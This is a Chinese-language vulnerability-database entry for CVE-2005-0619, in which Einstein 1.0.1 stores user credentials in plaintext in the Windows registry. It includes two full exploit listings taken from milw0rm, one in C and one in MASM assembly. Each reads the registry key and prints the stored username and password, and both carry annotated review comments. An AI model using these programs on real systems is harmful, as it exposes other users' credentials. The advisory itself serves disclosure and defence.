CVE-2005-0619
CVSS2.1
发布时间 :2005-02-28 00:00:00
修订时间 :2008-09-10 15:36:18

[原文]Einstein 1.0.1 stores sensitive information such as usernames and passwords in plaintext in the registry, which allows local users to gain privileges.


[CNNVD]Einstein 注册表敏感信息存储漏洞(CNNVD-200502-105)

        Einstein是一款为Mac OS X设计的问题测试软件。
        Einstein 1.0.1 在注册表里以明文的形式存储了username和password等敏感信息,本地用户可以以此获得相应权限。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0619
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0619
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-105
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/14212
(VENDOR_ADVISORY)  OSVDB  14212
http://securitytracker.com/id?1013316
(VENDOR_ADVISORY)  SECTRACK  1013316
http://secunia.com/advisories/14455
(VENDOR_ADVISORY)  SECUNIA  14455
http://milw0rm.com/exploits/846
(UNKNOWN)  MILW0RM  846

- 漏洞信息

Einstein 注册表敏感信息存储漏洞
低危 未知
2005-02-28 00:00:00 2005-10-20 00:00:00
本地  
        Einstein是一款为Mac OS X设计的问题测试软件。
        Einstein 1.0.1 在注册表里以明文的形式存储了username和password等敏感信息,本地用户可以以此获得相应权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (846)

Einstein <= 1.01 Local Password Disclosure Exploit (EDBID:846)
windows local
2005-02-27 Verified
0 Kozan
/*******************************************************************

Einstein v1.01 Local Password Disclosure Exploit by Kozan

Application: Einstein v1.01 (and previous versions)
Producer: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <windows.h>

/* Capacity, in bytes, of each buffer that receives a registry value. */
#define BUFSIZE 100

/* Handle of the registry key opened by main(). */
HKEY hKey;

/* Destination buffers for the "username" and "password" value data. */
char username[BUFSIZE];
char password[BUFSIZE];

/*
 * Byte count handed to RegQueryValueEx. The API treats it as in/out:
 * buffer capacity going in, number of bytes stored coming out.
 */
DWORD dwBufLen = BUFSIZE;

/* Status code returned by the most recent RegQueryValueEx call. */
LONG lRet;

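/*
 * Demonstrates the plaintext-credential storage issue described on this
 * page: opens HKLM\Software\einstein with query-only access, reads the
 * "username" and "password" values and prints them.
 *
 * Returns 0 on every path (values printed, key missing, or query failed).
 *
 * Corrections relative to the original listing:
 *  - dwBufLen is an in/out argument of RegQueryValueEx (buffer capacity in,
 *    bytes stored out). It is now reset before each query; the original
 *    reused the length left behind by the "username" query as the capacity
 *    for "password".
 *  - Registry string data is not guaranteed to be NUL-terminated. One byte
 *    of each buffer is held back and a terminator is written before the
 *    buffer is passed to printf("%s"), so printing cannot run past the end
 *    of the array.
 *
 * Reviewer note (defensive): the exposure is in how the application stores
 * the secret, not in this reader -- any account permitted to read the key
 * sees the same data. The fix belongs in the application (keep the password
 * out of the registry, or protect it with the platform's data-protection /
 * credential-storage facilities). A restrictive ACL on the key and auditing
 * of reads are interim measures. The page lists no vendor fix.
 */
int main(void)
{
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\einstein",
                     0,
                     KEY_QUERY_VALUE,
                     &hKey) != ERROR_SUCCESS) {
        printf("Einstein v1.01 is not installed on your system!\n");
        return 0;
    }

    /* Leave room for the terminator written below. */
    dwBufLen = BUFSIZE - 1;
    lRet = RegQueryValueEx(hKey, "username", NULL, NULL,
                           (LPBYTE) username, &dwBufLen);
    if ((lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE - 1)) {
        RegCloseKey(hKey);
        printf("En error occured!");
        return 0;
    }
    username[dwBufLen] = '\0';

    /* Reset the capacity: the previous call overwrote it with a length. */
    dwBufLen = BUFSIZE - 1;
    lRet = RegQueryValueEx(hKey, "password", NULL, NULL,
                           (LPBYTE) password, &dwBufLen);
    if ((lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE - 1)) {
        RegCloseKey(hKey);
        printf("En error occured!");
        return 0;
    }
    password[dwBufLen] = '\0';

    RegCloseKey(hKey);

    printf("Einstein v1.01 Local Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("www.netmagister.com  -  www.spyinstructors.com\n");
    printf("kozan@netmagister.com\n\n");
    printf("Username: %s\n", username);
    printf("Password: %s\n", password);

    return 0;
}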

// milw0rm.com [2005-02-27]
		

- 漏洞信息 (848)

Einstein <= 1.01 Local Password Disclosure Exploit (asm) (EDBID:848)
windows local
2005-02-28 Verified
0 illwill
; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     ; literal: emits the quoted text as a zero-terminated byte string in the
     ; .data section under a macro-local label, switches back to .code, and
     ; expands to that label so the string can be used inline.
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     ; SADD: expands to "ADDR <label>" for an inline string created by
     ; literal, for use as an invoke argument.
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
; Initialised data: registry path, value names, messages and the output format.
.data
   ; Subkey opened under HKEY_LOCAL_MACHINE and the two value names read from it.
   SubKey            db "Software\\einstein",0
   szUser            db "username",0
   szPass            db "password",0
   ; Printed when the subkey cannot be opened.
   noExeem           db "Einstein v1.01 is not installed on your pc!",0
   ; wsprintf format string: a banner followed by two %s placeholders.
   Theoutput  db   '_______________________________________________________________',13,10
              db   '*               Einstein v1.01 Local  Pass Exploit            *',13,10
              db   '*                    Based On Kozans code in C                *',13,10
              db   '*                by illwill  - xillwillx@yahoo.com            *',13,10
              db   '*_____________________________________________________________*',13,10
              db   '                      UserName: %s                             ',13,10
              db   '                      Password: %s                             ',13,10,0
   ; Byte count passed by address to RegQueryValueEx (in: buffer size, out:
   ; bytes stored).
   ; NOTE(review): 255 is larger than the 64-byte buffers declared below that
   ; receive the data, so the API is told it may store more than they hold.
   KeySize    DWORD 255
; Uninitialised data: value buffers, the key handle and the output buffer.
.data?
    TheIPData           db 64 dup (?)
    TheUSERData         db 64 dup (?)
    ThePASSData         db 64 dup (?)
    ; Receives the key handle from RegOpenKeyEx.
    TheReturn           DWORD ?
    ; Destination of wsprintf.
    ; NOTE(review): the banner text in Theoutput alone appears to be longer
    ; than 258 bytes, so formatting would write past this buffer -- confirm.
    strbuf              db 258 dup (?) 
; Entry point: open HKLM\<SubKey> for reading, query the "username" and
; "password" values, format them into strbuf and write the result to stdout.
; If the key cannot be opened, the "not installed" message is printed instead.
.code
start:
    ; On success the key handle is stored in TheReturn.
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
     .IF eax==ERROR_SUCCESS
        ; NOTE(review): the return code of each query is not tested; only the
        ; byte count left in KeySize is inspected. KeySize is also not reset
        ; between the two queries, so the second call is given the length
        ; stored by the first as its buffer size.
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
                        ; A stored length below 2 bytes is treated as "no value".
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
                        .ENDIF
        ; NOTE(review): three data arguments are passed for the two %s
        ; placeholders in Theoutput, so labels and values do not line up as
        ; written. TheIPData is never filled in by this listing.
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
        invoke StdOut, addr strbuf
     .ELSE  
        invoke StdOut, addr noExeem  
     .ENDIF
    ; NOTE(review): reached on both branches, so RegCloseKey is also called
    ; with TheReturn when the open failed.
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start

; milw0rm.com [2005-02-28]
		

- 漏洞信息

14212
Einstein Registry Cleartext Password Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Einstein contains a flaw that may lead to an unauthorized information disclosure. The issue is due to plaintext storage of passwords in the registry, which may disclose username (mail address) and passwords to local users resulting in a loss of confidentiality.

- 时间线

2005-02-27 Unknown
2005-02-27 Unknown

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 
